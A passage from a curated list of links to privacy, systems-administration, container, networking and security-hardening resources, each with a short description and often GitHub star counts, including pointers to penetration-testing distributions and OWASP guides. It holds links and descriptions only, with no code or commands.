search<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://search.disconnect.me/">🌎 <b>Disconnect</b></a> - the search engine that anonymizes your searches.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://metager.org/">🌎 <b>MetaGer</b></a> - the search engine that uses anonymous proxy and hidden Tor branches.<br> </p> ##### :black_small_square: Secure Webmail Providers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://countermail.com/">🌎 <b>CounterMail</b></a> - online email service, designed to provide maximum security and privacy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://mail2tor.com/"><b>Mail2Tor</b></a> - is a Tor Hidden Service that allows anyone to send and receive emails anonymously.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tutanota.com/">🌎 <b>Tutanota</b></a> - is the world's most secure email service and amazingly easy to use.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://protonmail.com/">🌎 <b>Protonmail</b></a> - is the world's largest secure email service, developed by CERN and MIT scientists.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.startmail.com/en/">🌎 <b>Startmail</b></a> - private & encrypted email made easy.<br> </p> ##### :black_small_square: Crypto <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keybase.io/">🌎 <b>Keybase</b></a> - it's open source and powered by public-key cryptography.<br> </p> ##### :black_small_square: PGP Keyservers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keyserver.ubuntu.com/">🌎 <b>SKS OpenPGP Key server</b></a> - services for the SKS keyservers used by OpenPGP.<br> </p> #### Systems/Services &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Operating Systems <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.slackware.com/"><b>Slackware</b></a> - the most "Unix-like" Linux distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openbsd.org/">🌎 <b>OpenBSD</b></a> - multi-platform 4.4BSD-based UNIX-like operating system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hardenedbsd.org/">🌎 <b>HardenedBSD</b></a> - HardenedBSD aims to implement innovative exploit mitigation and security solutions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.kali.org/">🌎 <b>Kali Linux</b></a> - Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.parrotsec.org/">🌎 <b>Parrot Security OS</b></a> - cyber security GNU/Linux environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.backbox.org/">🌎 <b>Backbox Linux</b></a> - penetration test and security assessment oriented Ubuntu-based Linux distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blackarch.org/">🌎 <b>BlackArch</b></a> - is an Arch Linux-based penetration testing distribution for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.pentoo.ch/">🌎 <b>Pentoo</b></a> - is a security-focused livecd based on Gentoo.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securityonion.net/">🌎 <b>Security Onion</b></a> - Linux distro for intrusion detection, enterprise security monitoring, and log management.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tails.boum.org/">🌎 <b>Tails</b></a> - is a live system that aims to preserve your privacy and anonymity.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;286⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;29🍴</code></b> <a href="https://github.com/vedetta-com/vedetta"><b>vedetta</b></a></a> - OpenBSD router boilerplate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.qubes-os.org">🌎 <b>Qubes OS</b></a> - is a security-oriented OS that uses Xen-based virtualization.<br> </p> ##### :black_small_square: HTTP(s) Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://varnish-cache.org/">🌎 <b>Varnish Cache</b></a> - HTTP accelerator designed for content-heavy dynamic web sites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nginx.org/">🌎 <b>Nginx</b></a> - open source web and reverse proxy server that is similar to Apache, but very light weight.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://openresty.org/en/">🌎 <b>OpenResty</b></a> - is a dynamic web platform based on NGINX and LuaJIT.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;12216⭐</code></b> <b><code>&nbsp;&nbsp;2500🍴</code></b> <a href="https://github.com/alibaba/tengine"><b>Tengine</b></a></a> - a distribution of Nginx with some advanced features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://caddyserver.com/">🌎 <b>Caddy Server</b></a> - is an open source, HTTP/2-enabled web server with HTTPS by default.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.haproxy.org/">🌎 <b>HAProxy</b></a> - the reliable, high performance TCP/HTTP load balancer.<br> </p> ##### :black_small_square: DNS Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nlnetlabs.nl/projects/unbound/about/">🌎 <b>Unbound</b></a> - validating, recursive, and caching DNS resolver (with TLS).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.knot-resolver.cz/">🌎 <b>Knot Resolver</b></a> - caching full resolver implementation, including both a resolver library and a daemon.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.powerdns.com/">🌎 <b>PowerDNS</b></a> - is an open source authoritative DNS server, written in C++ and licensed under the GPL.<br> </p> ##### :black_small_square: Other Services <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3180⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;735🍴</code></b> <a href="https://github.com/z3APA3A/3proxy"><b>3proxy</b></a></a> - tiny free proxy server.<br> </p> ##### :black_small_square: Security/hardening <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/EmeraldOnion">🌎 <b>Emerald Onion</b></a> - is a 501(c)(3) nonprofit organization and transit internet service provider (ISP).<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;43113⭐</code></b> <b><code>&nbsp;&nbsp;2524🍴</code></b> <a href="https://github.com/pi-hole/pi-hole"><b>pi-hole</b></a></a> - the Pi-hole® is a DNS sinkhole that protects your devices from unwanted content.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5283⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;970🍴</code></b> <a href="https://github.com/stamparm/maltrail"><b>maltrail</b></a></a> - malicious traffic detection system.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4337⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;835🍴</code></b> <a href="https://github.com/Netflix/security_monkey"><b>security_monkey</b></a></a> - monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;22254⭐</code></b> <b><code>&nbsp;&nbsp;1596🍴</code></b> <a href="https://github.com/firecracker-microvm/firecracker"><b>firecracker</b></a></a> - secure and fast microVMs for serverless computing.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;23014⭐</code></b> <b><code>&nbsp;&nbsp;2036🍴</code></b> <a href="https://github.com/StreisandEffect/streisand"><b>streisand</b></a></a> - sets up a new server running your choice of WireGuard, OpenSSH, OpenVPN, and more.<br> </p> #### Networks &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.capanalysis.net/ca/">🌎 <b>CapAnalysis</b></a> - web visual tool to analyze large amounts of captured network traffic (PCAP analyzer).<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13012⭐</code></b> <b><code>&nbsp;&nbsp;2219🍴</code></b> <a href="https://github.com/digitalocean/netbox"><b>netbox</b></a></a> - IP address management (IPAM) and data center infrastructure management (DCIM) tool.<br> </p> ##### :black_small_square: Labs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.networkreliability.engineering/">🌎 <b>NRE Labs</b></a> - learn automation by doing it. Right now, right here, in your browser.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ee.lbl.gov/">🌎 <b>LBNL's Network Research Group</b></a> - home page of the Network Research Group (NRG).<br> </p> #### Containers/Orchestration &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: CLI Tools <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;14083⭐</code></b> <b><code>&nbsp;&nbsp;1205🍴</code></b> <a href="https://github.com/google/gvisor"><b>gvisor</b></a></a> - container runtime sandbox.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;14540⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;531🍴</code></b> <a href="https://github.com/bcicen/ctop"><b>ctop</b></a></a> - top-like interface for container metrics.<br> </p> ##### :black_small_square: Web Tools <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;66479⭐</code></b> <b><code>&nbsp;18858🍴</code></b> <a href="https://github.com/moby/moby"><b>Moby</b></a></a> - a collaborative project for the container ecosystem to assemble container-based system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://traefik.io/">🌎 <b>Traefik</b></a> - open source reverse proxy/load balancer provides easier integration with Docker and Let's encrypt.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;35721⭐</code></b> <b><code>&nbsp;&nbsp;4587🍴</code></b> <a href="https://github.com/Kong/kong"><b>kong</b></a></a> - The Cloud-Native API Gateway.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;21430⭐</code></b> <b><code>&nbsp;&nbsp;2861🍴</code></b> <a href="https://github.com/rancher/rancher"><b>rancher</b></a></a> - complete container management platform.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;26268⭐</code></b> <b><code>&nbsp;&nbsp;2222🍴</code></b> <a href="https://github.com/portainer/portainer"><b>portainer</b></a></a> - making Docker management easy.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;17329⭐</code></b> <b><code>&nbsp;&nbsp;2927🍴</code></b> <a href="https://github.com/jwilder/nginx-proxy"><b>nginx-proxy</b></a></a> - automated nginx proxy for Docker containers using docker-gen.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3032⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;196🍴</code></b> <a href="https://github.com/bunkerity/bunkerized-nginx"><b>bunkerized-nginx</b></a></a> - nginx docker image "secure by default".<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8479⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;974🍴</code></b> <a href="https://github.com/docker/docker-bench-security"><b>docker-bench-security</b></a></a> - checks for dozens of common best-practices around deploying Docker.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;18324⭐</code></b> <b><code>&nbsp;&nbsp;1829🍴</code></b> <a href="https://github.com/aquasecurity/trivy"><b>trivy</b></a></a> - vulnerability scanner for containers, suitable for CI.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://goharbor.io/">🌎 <b>Harbor</b></a> - cloud native registry project that stores, signs, and scans content.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://houdini.secsi.io/">🌎 <b>Houdini</b></a> - hundreds of offensive and useful docker images for network intrusion.<br> </p> ##### :black_small_square: Manuals/Tutorials/Best Practices <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;21591⭐</code></b> <b><code>&nbsp;&nbsp;4609🍴</code></b> <a href="https://github.com/wsargent/docker-cheat-sheet"><b>docker-cheat-sheet</b></a></a> - a quick reference cheat sheet on Docker.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;26035⭐</code></b> <b><code>&nbsp;&nbsp;2790🍴</code></b> <a href="https://github.com/veggiemonk/awesome-docker"><b>awesome-docker</b></a></a> - a curated list of Docker resources and projects.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;22771⭐</code></b> <b><code>&nbsp;&nbsp;5580🍴</code></b> <a href="https://github.com/yeasy/docker_practice"><b>docker_practice</b></a></a> - learn and understand Docker technologies, with real DevOps practice!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/docker/labs"><b>labs </b></a> - is a collection of tutorials for learning how to use Docker with various tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13242⭐</code></b> <b><code>&nbsp;&nbsp;2518🍴</code></b> <a href="https://github.com/jessfraz/dockerfiles"><b>dockerfiles</b></a></a> - various Dockerfiles I use on the desktop and on servers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;36245⭐</code></b> <b><code>&nbsp;12516🍴</code></b> <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way"><b>kubernetes-the-hard-way</b></a></a> - bootstrap Kubernetes the hard way on Google Cloud Platform. No scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;115⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;11🍴</code></b> <a href="https://github.com/jamesward/kubernetes-the-easy-way"><b>kubernetes-the-easy-way</b></a></a> - bootstrap Kubernetes the easy way on Google Cloud Platform. No scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1792⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;925🍴</code></b> <a href="https://github.com/dennyzhang/cheatsheet-kubernetes-A4"><b>cheatsheet-kubernetes-A4</b></a></a> - Kubernetes CheatSheets in A4.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;693⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;69🍴</code></b> <a href="https://github.com/kabachook/k8s-security"><b>k8s-security</b></a></a> - kubernetes security notes and best practices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://learnk8s.io/production-best-practices/">🌎 <b>kubernetes-production-best-practices</b></a> - checklists with best-practices for production-ready Kubernetes.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2649⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;249🍴</code></b> <a href="https://github.com/freach/kubernetes-security-best-practice"><b>kubernetes-production-best-practices</b></a></a> - kubernetes security - best practice guide.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6241⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;306🍴</code></b> <a href="https://github.com/hjacobs/kubernetes-failure-stories"><b>kubernetes-failure-stories</b></a></a> - is a compilation of public failure/horror stories related to Kubernetes.<br> </p> #### Manuals/Howtos/Tutorials &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Shell/Command line <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;34604⭐</code></b> <b><code>&nbsp;&nbsp;3149🍴</code></b> <a href="https://github.com/dylanaraps/pure-bash-bible"><b>pure-bash-bible</b></a></a> - is a collection of pure bash alternatives to external processes.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6051⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;242🍴</code></b> <a href="https://github.com/dylanaraps/pure-sh-bible"><b>pure-sh-bible</b></a></a> - is a collection of pure POSIX sh alternatives to external processes.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;11311⭐</code></b> <b><code>&nbsp;&nbsp;1077🍴</code></b> <a href="https://github.com/Idnan/bash-guide"><b>bash-guide</b></a></a> - is a guide to learn bash.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5399⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;763🍴</code></b> <a href="https://github.com/denysdovhan/bash-handbook"><b>bash-handbook</b></a></a> - for those who wanna learn Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.bash-hackers.org/start">🌎 <b>The Bash Hackers Wiki</b></a> - hold documentation of any kind about GNU Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html"><b>Shell & Utilities</b></a> - describes the commands offered to application programs by POSIX-conformant systems.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>138710⭐</code></b> <b><code>&nbsp;13730🍴</code></b> <a href="https://github.com/jlevy/the-art-of-command-line"><b>the-art-of-command-line</b></a></a> - master the command line, in one page.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://google.github.io/styleguide/shellguide.html">🌎 <b>Shell Style Guide</b></a> - a shell style guide for Google-originated open-source projects.<br> </p> ##### :black_small_square: Text Editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vim.rtorr.com/">🌎 <b>Vim Cheat Sheet</b></a> - great multi language vim guide.<br> </p> ##### :black_small_square: Python <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://awesome-python.com/">🌎 <b>Awesome Python</b></a> - a curated list of awesome Python frameworks, libraries, software and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;33156⭐</code></b> <b><code>&nbsp;&nbsp;6070🍴</code></b> <a href="https://github.com/gto76/python-cheatsheet"><b>python-cheatsheet</b></a></a> - comprehensive Python cheatsheet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.pythoncheatsheet.org/">🌎 <b>pythoncheatsheet.org</b></a> - basic reference for beginner and advanced developers.<br> </p> ##### :black_small_square: Sed & Awk & Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://posts.specterops.io/fawk-yeah-advanced-sed-and-awk-usage-parsing-for-pentesters-3-e5727e11a8ad?gi=c8f9506b26b6">🌎 <b>F’Awk Yeah!</b></a> - advanced sed and awk usage (Parsing for Pentesters 3).<br> </p> ##### :black_small_square: \*nix & Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cyberciti.biz/">🌎 <b>nixCraft</b></a> - linux and unix tutorials for new and seasoned sysadmin.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tecmint.com/">🌎 <b>TecMint</b></a> - the ideal Linux blog for Sysadmins & Geeks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.omnisecu.com/index.php"><b>Omnisecu</b></a> - free Networking, System Administration and Security tutorials.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;760⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;147🍴</code></b> <a href="https://github.com/cirosantilli/linux-cheat"><b>linux-cheat</b></a></a> - Linux tutorials and cheatsheets. Minimal examples. Mostly user-land CLI utilities.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3358⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;563🍴</code></b> <a href="https://github.com/snori74/linuxupskillchallenge"><b>linuxupskillchallenge</b></a></a> - learn the skills required to sysadmin.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://cb.vu/unixtoolbox.xhtml"><b>Unix Toolbox</b></a> - Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linux-kernel-labs.github.io/refs/heads/master/index.html">🌎 <b>Linux Kernel Teaching</b></a> - is a collection of lectures and labs Linux kernel topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://peteris.rocks/blog/htop/">🌎 <b>htop explained</b></a> - explanation of everything you can see in htop/top on Linux.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linuxguideandhints.com/">🌎 <b>Linux Guide and Hints</b></a> - tutorials on system administration in Fedora and CentOS.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;247⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;12🍴</code></b> <a href="https://github.com/NanXiao/strace-little-book"><b>strace-little-book</b></a></a> - a little book which introduces strace.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1189⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;286🍴</code></b> <a href="https://github.com/goldshtn/linux-tracing-workshop"><b>linux-tracing-workshop</b></a></a> - examples and hands-on labs for Linux tracing tools workshops.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2210⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;290🍴</code></b> <a href="https://github.com/bagder/http2-explained"><b>http2-explained</b></a></a> - a detailed document explaining and documenting HTTP/2.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2072⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;194🍴</code></b> <a href="https://github.com/bagder/http3-explained"><b>http3-explained</b></a></a> - a document describing the HTTP/3 and QUIC protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.manning.com/books/http2-in-action">🌎 <b>HTTP/2 in Action</b></a> - an excellent introduction to the new HTTP/2 standard.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/">🌎 <b>Let's code a TCP/IP stack</b></a> - great stuff to learn network and system programming at a deeper level.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13164⭐</code></b> <b><code>&nbsp;&nbsp;1058🍴</code></b> <a href="https://github.com/trimstray/nginx-admins-handbook"><b>Nginx Admin's Handbook</b></a></a> - how to improve NGINX performance, security and other important things.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;26051⭐</code></b> <b><code>&nbsp;&nbsp;1934🍴</code></b> <a href="https://github.com/digitalocean/nginxconfig.io"><b>nginxconfig.io</b></a></a> - NGINX config generator on steroids.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/openssh">🌎 <b>openssh guideline</b></a> - is to help operational teams with the configuration of OpenSSH server and client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gravitational.com/blog/ssh-handshake-explained/">🌎 <b>SSH Handshake Explained</b></a> - is a relatively brief description of the SSH handshake.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://kb.isc.org/docs/using-this-knowledgebase">🌎 <b>ISC's Knowledgebase</b></a> - you'll find some general information about BIND 9, ISC DHCP, and Kea DHCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetlife.net/">🌎 <b>PacketLife.net</b></a> - a place to record notes while studying for Cisco's CCNP certification.<br> </p> ##### :black_small_square: Microsoft <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4015⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;990🍴</code></b> <a href="https://github.com/infosecn1nja/AD-Attack-Defense"><b>AD-Attack-Defense</b></a></a> - attack and defend active directory using modern post exploitation activity.<br> </p> ##### :black_small_square: Large-scale systems <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>227077⭐</code></b> <b><code>&nbsp;40122🍴</code></b> <a href="https://github.com/donnemartin/system-design-primer"><b>The System Design Primer</b></a></a> - learn how to design large-scale systems.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;47404⭐</code></b> <b><code>&nbsp;&nbsp;5209🍴</code></b> <a href="https://github.com/binhnguyennus/awesome-scalability"><b>Awesome Scalability</b></a></a> - best practices in building High Scalability, High Availability, High Stability, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://engineering.videoblocks.com/web-architecture-101-a3224e126947?gi=a896808d22a">🌎 <b>Web Architecture 101</b></a> - the basic architecture concepts.<br> </p> ##### :black_small_square: System hardening <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cisecurity.org/cis-benchmarks/">🌎 <b>CIS Benchmarks</b></a> - secure configuration settings for over 100 technologies, available as a free PDF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://highon.coffee/blog/security-harden-centos-7/">🌎 <b>Security Harden CentOS 7</b></a> - this walks you through the steps required to security harden CentOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.lisenet.com/2017/centos-7-server-hardening-guide/">🌎 <b>CentOS 7 Server Hardening Guide</b></a> - great guide for hardening CentOS; familiar with OpenSCAP.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4490⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;501🍴</code></b> <a href="https://github.com/decalage2/awesome-security-hardening"><b>awesome-security-hardening</b></a></a> - is a collection of security hardening guides, tools and other resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;9482⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;592🍴</code></b> <a href="https://github.com/trimstray/the-practical-linux-hardening-guide"><b>The Practical Linux Hardening Guide</b></a></a> - provides a high-level overview of hardening GNU/Linux systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://madaidans-insecurities.github.io/guides/linux-hardening.html">🌎 <b>Linux Hardening Guide</b></a> - how to harden Linux as much as possible for security and privacy.<br> </p> ##### :black_small_square: Security & Privacy <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackingarticles.in/">🌎 <b>Hacking Articles</b></a> - LRaj Chandel's Security & Hacking Blog.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8329⭐</code></b> <b><code>&nbsp;&nbsp;1437🍴</code></b> <a href="https://github.com/toniblyx/my-arsenal-of-aws-security-tools"><b>AWS security tools</b></a></a> - make your AWS cloud environment more secure.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://inventory.rawsec.ml/index.html">🌎 <b>Rawsec's CyberSecurity Inventory</b></a> - an inventory of tools and resources about CyberSecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tls.ulfheim.net/">🌎 <b>The Illustrated TLS Connection</b></a> - every byte of a TLS connection explained and reproduced.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices"><b>SSL Research</b></a></a> - SSL and TLS Deployment Best Practices by SSL Labs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://selinuxgame.org/index.html"><b>SELinux Game</b></a> - learn SELinux by doing. Solve Puzzles, show skillz.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://smallstep.com/blog/everything-pki.html">🌎 <b>Certificates and PKI</b></a> - everything you should know about certificates and PKI but are too afraid to ask.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://appsecco.com/books/subdomain-enumeration/">🌎 <b>The Art of Subdomain Enumeration</b></a> - a reference for subdomain enumeration techniques.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lifehacker.com/the-comprehensive-guide-to-quitting-google-1830001964">🌎 <b>Quitting Google</b></a> - the comprehensive guide to quitting Google.<br> </p> ##### :black_small_square: Web Apps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Main_Page">🌎 <b>OWASP</b></a> - worldwide not-for-profit charitable organization focused on improving the security of software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project">🌎 <b>OWASP ASVS 3.0.1</b></a> - OWASP Application Security Verification Standard Project.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;141⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;33🍴</code></b> <a href="https://github.com/Santandersecurityresearch/asvs"><b>OWASP ASVS 3.0.1 Web App</b></a></a> - simple web app that helps developers understand the ASVS requirements.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2265⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;573🍴</code></b> <a href="https://github.com/OWASP/ASVS/tree/master/4.0"><b>OWASP ASVS 4.0</b></a></a> - is a list of application security requirements or tests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Testing_Project">🌎 <b>OWASP Testing Guide v4</b></a> - includes a "best practice" penetration testing framework.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2007⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;387🍴</code></b> <a href="https://github.com/OWASP/DevGuide"><b>OWASP Dev Guide</b></a></a> - this is the development version of the OWASP Developer Guide.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5827⭐</code></b> <b><code>&nbsp;&nbsp;1164🍴</code></b> <a href="https://github.com/OWASP/wstg"><b>OWASP WSTG</b></a></a> - is a comprehensive open source guide to testing the security of web apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_API_Security_Project">🌎 <b>OWASP API Security Project</b></a> - focuses specifically on the top ten vulnerabilities in API security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/web_security.html">🌎 <b>Mozilla Web Security</b></a> - help operational teams with creating secure web applications.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;734⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;121🍴</code></b> <a href="https://github.com/Netflix/security-bulletins"><b>security-bulletins</b></a></a> - security bulletins that relate to Netflix Open Source.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;21151⭐</code></b> <b><code>&nbsp;&nbsp;2529🍴</code></b> <a 